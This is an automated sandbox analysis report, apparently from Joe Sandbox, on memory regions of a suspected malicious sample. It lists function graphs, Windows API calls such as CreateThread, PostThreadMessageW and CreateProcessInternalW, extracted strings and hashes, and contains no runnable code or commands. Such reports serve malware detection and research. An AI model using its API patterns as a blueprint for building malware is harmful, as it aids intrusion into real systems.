                                                      control_flow_graph 0 2dc9688-2dc968e 1 2dc96ff-2dc9bc0 0->1 2 2dc9690-2dc96c1 call 2dc1410 call 2de15d0 0->2 4 2dc9bca-2dc9bd4 1->4 19 2dc96e0-2dc96e5 2->19 20 2dc96c3-2dc96df call 2deb7a7 CreateThread 2->20 6 2dc9c08-2dc9c12 4->6 7 2dc9bd6-2dc9bf5 4->7 11 2dc9c23-2dc9c2f 6->11 9 2dc9c06 7->9 10 2dc9bf7-2dc9c00 7->10 9->4 10->9 12 2dc9c4d-2dc9c54 11->12 13 2dc9c31-2dc9c3d 11->13 17 2dc9c86-2dc9c8d 12->17 18 2dc9c56-2dc9c84 12->18 15 2dc9c3f-2dc9c45 13->15 16 2dc9c4b 13->16 15->16 16->11 22 2dc9c8f-2dc9ca5 17->22 23 2dc9cb2-2dc9cb6 17->23 18->12 25 2dc9ca7-2dc9cad 22->25 26 2dc9cb0 22->26 28 2dc9cb8-2dc9cc0 23->28 29 2dc9d00-2dc9d07 23->29 25->26 26->17 32 2dc9cc7-2dc9cd9 28->32 33 2dc9cc2-2dc9cc6 28->33 30 2dc9d39-2dc9d56 29->30 31 2dc9d09-2dc9d37 29->31 34 2dc9d67-2dc9d70 30->34 31->29 35 2dc9cdb-2dc9cdf 32->35 36 2dc9ce0-2dc9ce2 32->36 33->32 37 2dc9d86-2dc9d90 34->37 38 2dc9d72-2dc9d84 34->38 35->36 39 2dc9ce4-2dc9ced 36->39 40 2dc9cf0-2dc9cfe 36->40 42 2dc9dca-2dc9ddb 37->42 43 2dc9d92-2dc9d9d 37->43 38->34 39->40 40->23 46 2dc9dec-2dc9df5 42->46 44 2dc9d9f-2dc9da3 43->44 45 2dc9da4-2dc9da6 43->45 44->45 49 2dc9da8-2dc9db7 45->49 50 2dc9db9-2dc9dc2 45->50 47 2dc9e0b 46->47 48 2dc9df7-2dc9e09 46->48 52 2dc9e12-2dc9e19 47->52 48->46 53 2dc9dc8 49->53 50->53 54 2dc9e4a 52->54 55 2dc9e1b-2dc9e48 52->55 53->37 56 2dc9e51-2dc9e5a 54->56 55->52 57 2dca0da-2dca0e1 56->57 58 2dc9e60-2dc9e6a 56->58 60 2dca256-2dca260 57->60 61 2dca0e7-2dca0f1 57->61 59 2dc9e7b-2dc9e87 58->59 62 2dc9eac-2dc9eb5 59->62 63 2dc9e89-2dc9e99 59->63 64 2dca271-2dca27d 60->64 65 2dca102-2dca10b 61->65 72 2dc9eda-2dc9ee1 62->72 73 2dc9eb7-2dc9ed8 62->73 68 2dc9eaa 63->68 69 2dc9e9b-2dc9ea4 63->69 70 2dca27f-2dca288 64->70 71 2dca295-2dca29f 64->71 66 2dca10d-2dca11f 65->66 67 2dca121-2dca12b 65->67 66->65 78 2dca13c-2dca148 67->78 68->59 69->68 80 2dca28a-2dca290 70->80 81 2dca293 70->81 76 2dca2b0-2dca2b9 71->76 74 2dc9f03-2dc9f06 72->74 75 2dc9ee3-2dc9f01 72->75 73->62 83 2dc9f0c-2dc9f10 74->83 75->72 84 2dca2cc-2dca2d6 76->84 85 2dca2bb-2dca2ca 76->85 86 2dca15e-2dca165 78->86 87 2dca14a-2dca15c 78->87 80->81 81->64 88 2dc9f39-2dc9f43 83->88 89 2dc9f12-2dc9f37 83->89 91 2dca2e7-2dca2f3 84->91 85->76 93 2dca19c-2dca1a6 86->93 94 2dca167-2dca19a 86->94 87->78 95 2dc9f54-2dc9f60 88->95 89->83 96 2dca30a-2dca314 91->96 97 2dca2f5-2dca308 91->97 98 2dca1b7-2dca1c3 93->98 94->86 99 2dc9f76-2dc9f85 95->99 100 2dc9f62-2dc9f74 95->100 97->91 102 2dca1ea-2dca1f3 98->102 103 2dca1c5-2dca1ce 98->103 107 2dca00f-2dca019 99->107 108 2dc9f8b-2dc9f95 99->108 100->95 104 2dca20f-2dca219 102->104 105 2dca1f5-2dca20d 102->105 109 2dca1d5-2dca1d7 103->109 110 2dca1d0-2dca1d4 103->110 111 2dca22a-2dca233 104->111 105->102 112 2dca02a-2dca034 107->112 113 2dc9fcd-2dc9fd7 108->113 114 2dc9f97-2dc9fb1 108->114 115 2dca1e8 109->115 116 2dca1d9-2dca1e2 109->116 110->109 119 2dca235-2dca241 111->119 120 2dca251 call 2de9e40 111->120 121 2dca08e-2dca0a2 112->121 122 2dca036-2dca08c 112->122 117 2dc9fe8-2dc9ff4 113->117 123 2dc9fb8-2dc9fba 114->123 124 2dc9fb3-2dc9fb7 114->124 115->98 116->115 125 2dca00a 117->125 126 2dc9ff6-2dca008 117->126 127 2dca24f 119->127 128 2dca243-2dca249 119->128 120->60 131 2dca0b3-2dca0bf 121->131 122->112 132 2dc9fbc-2dc9fc5 123->132 133 2dc9fcb 123->133 124->123 125->57 126->117 127->111 128->127 136 2dca0d5 131->136 137 2dca0c1-2dca0d3 131->137 132->133 133->108 136->56 137->131
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02DC96D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$J$K.$N$O$Q$Q$Qz$R$V~$X$Y$Z$\$b$d$f$j$m`$u$uC$y9$0$^$l$}
                                                      • API String ID: 2422867632-1566399811
                                                      • Opcode ID: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                      • Instruction ID: ed4879de83361c0042bc115ff0c44bb4d3dc00420099f721223da300e8709ca9
                                                      • Opcode Fuzzy Hash: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                      • Instruction Fuzzy Hash: 54C157B0905369DBEB608F41C9587DEBAB1BB05308F2081C9D55C3B281CBFA1A89CF95
                                                      Function 02DD0D9F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                      • Instruction ID: cc6b1cb01a1a03073d7e6f2a726a2d0e2f624e954ec336f32b057fcefd65be0c
                                                      • Opcode Fuzzy Hash: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                      • Instruction Fuzzy Hash: 08019271D41259B6EB21ABA18C42FDF7B7C9F81B50F148055FA047B380D6B8AA06CBF5
                                                      Function 02DD0DA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 704 2dd0da0-2dd0db0 705 2dd0db9-2dd0e0e call 2deac60 call 2dd4770 call 2dc1410 call 2de15d0 704->705 706 2dd0db4 call 2dea250 704->706 715 2dd0e30-2dd0e35 705->715 716 2dd0e10-2dd0e21 PostThreadMessageW 705->716 706->705 716->715 717 2dd0e23-2dd0e2d 716->717 717->715
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                      • Instruction ID: cc6b1cb01a1a03073d7e6f2a726a2d0e2f624e954ec336f32b057fcefd65be0c
                                                      • Opcode Fuzzy Hash: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                      • Instruction Fuzzy Hash: 08019271D41259B6EB21ABA18C42FDF7B7C9F81B50F148055FA047B380D6B8AA06CBF5
                                                      Function 02DD0D86 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 718 2dd0d86-2dd0d8d 719 2dd0d8f-2dd0d97 718->719 720 2dd0dce-2dd0dd1 718->720 721 2dd0dd7-2dd0e0e call 2dc1410 call 2de15d0 720->721 722 2dd0dd2 call 2dd4770 720->722 727 2dd0e30-2dd0e35 721->727 728 2dd0e10-2dd0e21 PostThreadMessageW 721->728 722->721 728->727 729 2dd0e23-2dd0e2d 728->729 729->727
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                      • Instruction ID: 5cf4cde82e7ea9dfa0e25d0edfc8f641d3680d1a630037b4afa148d75a245966
                                                      • Opcode Fuzzy Hash: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                      • Instruction Fuzzy Hash: 2201FE31A4125876DB1157955C02FEFBB7CDF81711F104197FA04AB340D674AD118BE5
                                                      Function 02DD0D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                      • Instruction ID: 31c8bd1e5f523bb8ac6470d792ff26e864727209ece178ae294d20c8c178fd2b
                                                      • Opcode Fuzzy Hash: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                      • Instruction Fuzzy Hash: 97F0BB76E4126875DB2156914C02FAF7B79CF81B61F148095EA047B3C1D6B4AD028BE5
                                                      Function 02DE2EA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 02DE2F6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                      • Instruction ID: 3f5ea9a8a2f33f3ef3036511595f783575ad4e0fe227709db4c6be69315bd49b
                                                      • Opcode Fuzzy Hash: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                      • Instruction Fuzzy Hash: E4318FB1601705BBDB18EF65C884FE7BBB9EB48704F50861DB95A5B380D770BA40CBA1
                                                      Function 02DDEF26 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 02DDEF47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                      • Instruction ID: cc14cb566157deda78087a7fb999bb11535b19b317bea1d6961cae0408ef912a
                                                      • Opcode Fuzzy Hash: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                      • Instruction Fuzzy Hash: 5F313FB5A0060A9FDB10DFD8D8809EEB7B9FF88304F108559E916AB354D771AE45CBA0
                                                      Function 02DDEF30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 02DDEF47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                      • Instruction ID: 0d11977854e779dc2b4d94222ecc009836464f332fc8c2f9d2beb14028bd3b94
                                                      • Opcode Fuzzy Hash: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                      • Instruction Fuzzy Hash: 2C311EB5A0060A9FDB00DFD8D8809EFB7B9FF88304F108559E906AB354D775AE45CBA0
                                                      Function 02DDC2A8 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02DDC28F
                                                      • FindClose.KERNELBASE(?), ref: 02DDC29A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseFileNext
                                                      • String ID:
                                                      • API String ID: 2066263336-0
                                                      • Opcode ID: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                      • Instruction ID: 188dced462d3b081744057d72e05d1ac97fb268f1fdca9657665e98f2ef8774f
                                                      • Opcode Fuzzy Hash: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                      • Instruction Fuzzy Hash: D1D0123675401D9F4B108DF5AC84BED7B74FA94F62F1081AAE809D7140E731C901D6D0
                                                      Function 02DD4770 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02DD47E2
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction ID: 444fc5283c81e26ec5b87d0e31d49c6203006f1c38015083e78ef6dec0f24c4a
                                                      • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction Fuzzy Hash: EA011EB9E0020EBBDF10EAE4DC41F9EB3B9AB44708F0041A5E90997240F671EB14CBA1
                                                      Function 02DE86B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02DD8053,00000010,?,?,?,00000044,?,00000010,02DD8053,?,?,?), ref: 02DE8713
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                      • Instruction ID: 9d2a1a080e089a8e3acccc136e4aca56a6a528bc28aba2bc7459b0a8f8be8613
                                                      • Opcode Fuzzy Hash: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                      • Instruction Fuzzy Hash: 8901C0B2205109BBCB54DE99DC80EEB77AEEF8C754F508208BA09E3240D630FC518BA4
                                                      Function 02DC9690 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02DC96D5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                      • Instruction ID: b2a7a593240e6af6e11d18d41489c44916ee10735c9f106b5ff8262240c78c1c
                                                      • Opcode Fuzzy Hash: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                      • Instruction Fuzzy Hash: F6F030333842143AE62076A99C02FD7725CDB80765F24042AF70DDB2C0D995F84146A4
                                                      Function 02DE8620 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,02DD4043,000000F4,?,?,?,?,?), ref: 02DE865C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                      • Instruction ID: 5abf5c1c0fad3c5af322ddf5b9ecb7e165b69492e9ac497ed02881e5631eb62f
                                                      • Opcode Fuzzy Hash: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                      • Instruction Fuzzy Hash: 48E032B62042047BDA10EA99DC40EDB33ADEBC8710F004409F909A7281C631B8118AB4
                                                      Function 02DE85D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(02DD19B9,?,02DE4DCB,02DD19B9,02DE49C7,02DE4DCB,?,02DD19B9,02DE49C7,00001000,?,?,02DE9EA0), ref: 02DE860C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                      • Instruction ID: 06245885e901cf5fb016b721809a9010c4c55f08627e48556e04be775b79be2d
                                                      • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                      • Instruction Fuzzy Hash: 8AE0E5B22042197BDA14EE99EC41EDB77ADEFC9720F508419F90AA7281D670BD10CBB5
                                                      Function 02DD8090 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02DD80BC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                      • Instruction ID: 5d11cfdabc15a6fb46963ed7c210606a3bbc40e3edd94b659c699f38202b7fee
                                                      • Opcode Fuzzy Hash: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                      • Instruction Fuzzy Hash: 97E0D83120020416FA2469A8DC45B7633589744624F544B50B91CCB3C1E679FD429250
                                                      Function 02DD7EA0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02DD1CA0,02DE70E7,02DE49C7,?), ref: 02DD7ED3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                      • Instruction ID: a6c7cfa8ccb2b85ae873d1aaa24d76309a10eff2bf6446de8d34c96cc85ea72e
                                                      • Opcode Fuzzy Hash: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                      • Instruction Fuzzy Hash: F4D05E716443053BFA40A6F58C06F57328D8B50764F558468B90DEB3C2EDA5F9108AB5
                                                      Function 03742C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: be62c70b500c126e3b322d0b3b530adc5636310c5ea39eb0d5b2a04b59ad8415
                                                      • Instruction ID: d4b1494c3f50edf8072899d94d9abdb1f3e9df3ab97d22ced179fe52e7155aa8
                                                      • Opcode Fuzzy Hash: be62c70b500c126e3b322d0b3b530adc5636310c5ea39eb0d5b2a04b59ad8415
                                                      • Instruction Fuzzy Hash: A6B09B71A015C5D6EB15E7604608717794467D0701F19C471F2030651F4779D1D1E576

                                                      Non-executed Functions

                                                      Function 03A2053F Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4563280908.0000000003A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_3a20000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aac5dcc0867217ba4aba7e9cd7e431ab872d74c33f9427044c7fa6ef03974de3
                                                      • Instruction ID: 48e812853c5b051c3e34909679dca6e46ee0d18e67f2cd9631a98c8c06b3622e
                                                      • Opcode Fuzzy Hash: aac5dcc0867217ba4aba7e9cd7e431ab872d74c33f9427044c7fa6ef03974de3
                                                      • Instruction Fuzzy Hash: A041257161DB1D4FD368EF6C90816BBB7E2FB85300F50052ED98AC3752EA74E8428785
                                                      Function 03A2B743 Relevance: 56.5, Strings: 45, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4563280908.0000000003A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_3a20000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: acaf5d12afa628f009e63383bb23d224d841069a9dc0630c6d547ed248772fab
                                                      • Instruction ID: e7890e37c54eda3a6be995a4e86932085cd04d53d517547bce13a75aa61cfbaa
                                                      • Opcode Fuzzy Hash: acaf5d12afa628f009e63383bb23d224d841069a9dc0630c6d547ed248772fab
                                                      • Instruction Fuzzy Hash: 339141F04482948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                      Function 03742890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 2d988a4122ad5a1f79dab55f1a9830327c38736b71cd42f9f40d94c2f1eb4c01
                                                      • Instruction ID: 3cfcbc61a5092a5061299ad42e5af1abe4648fd013409eb0323813a0772941db
                                                      • Opcode Fuzzy Hash: 2d988a4122ad5a1f79dab55f1a9830327c38736b71cd42f9f40d94c2f1eb4c01
                                                      • Instruction Fuzzy Hash: 6451D7B6A00216BFDF10DF98C89097EFBBCBB092407148669F469D7642D774EE509BA0
                                                      Function 037B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
